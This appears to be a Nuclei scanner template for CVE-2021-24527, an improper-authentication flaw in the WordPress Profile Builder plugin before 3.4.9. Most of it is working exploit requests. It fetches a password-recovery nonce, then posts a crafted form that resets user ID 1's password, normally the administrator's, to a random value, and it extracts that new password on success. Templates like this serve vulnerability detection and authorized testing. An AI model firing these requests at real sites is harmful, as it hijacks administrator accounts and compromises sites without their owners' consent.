id: CVE-2021-24527

info:
  name: Profile Builder < 3.4.9 - Improper Authentication
  author: Sourabh-Sahu
  severity: critical
  description: |
    The Profile Builder plugin before 3.4.9 for WordPress allows unauthenticated attackers to gain administrative access by exploiting an improper authentication vulnerability in the password reset functionality. An attacker can reset the password of any user, including administrators, without proper authorization, leading to a complete site compromise.
  impact: |
    Unauthenticated attackers can reset passwords for any user including administrators without authorization, leading to complete site compromise and account takeover.
  remediation: Fixed in 3.4.9
  reference:
    - https://wpscan.com/vulnerability/c142e738-bc4b-4058-a03e-1be6fca47207/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24527
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24527
    epss-score: 0.75594
    epss-percentile: 0.98925
    cwe-id: CWE-287
    cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: cozmoslabs
    product: profile-builder
    publicwww-query: "/wp-content/plugins/profile-builder/"
  tags: cve,cve2021,wp,wp-plugin,wordpress,profile-builder,vkev,vuln

variables:
  pass: "{{to_lower(rand_text_alpha(12))}}"
  path: "{{path}}"

http:
  - raw:
      - |
        GET {{path}}/?key=%3Ca%3E HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'name="password_recovery_nonce_field2"\s+value="([^"]+)"'
        internal: true

  - raw:
      - |
        POST {{path}}/?key=%3Ca%3E HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8nxJ9mBo6lwGYE0K

        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="passw1"

        {{pass}}
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="userData"

        1
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="passw2"

        {{pass}}
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="recover_password2"

        Reset Password
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="action2"

        recover_password2
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="key"

        <a>
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="password_recovery_nonce_field2"

        {{nonce}}
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="_wp_http_referer"

        /?key=%3Ca%
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K--

    skip-variables-check: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Your password has been successfully changed")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - pass
# digest: 4a0a0047304502204751c971070ec3bb28329a1a93180071e55b4ae91ec64b716211a517ca01844a022100ea8e43183b8531f5ff4ffa3a5b4dac2549562c1a0c5860326b0c7cbf47bd6892:922c64590222798bb761d5b6d8e72950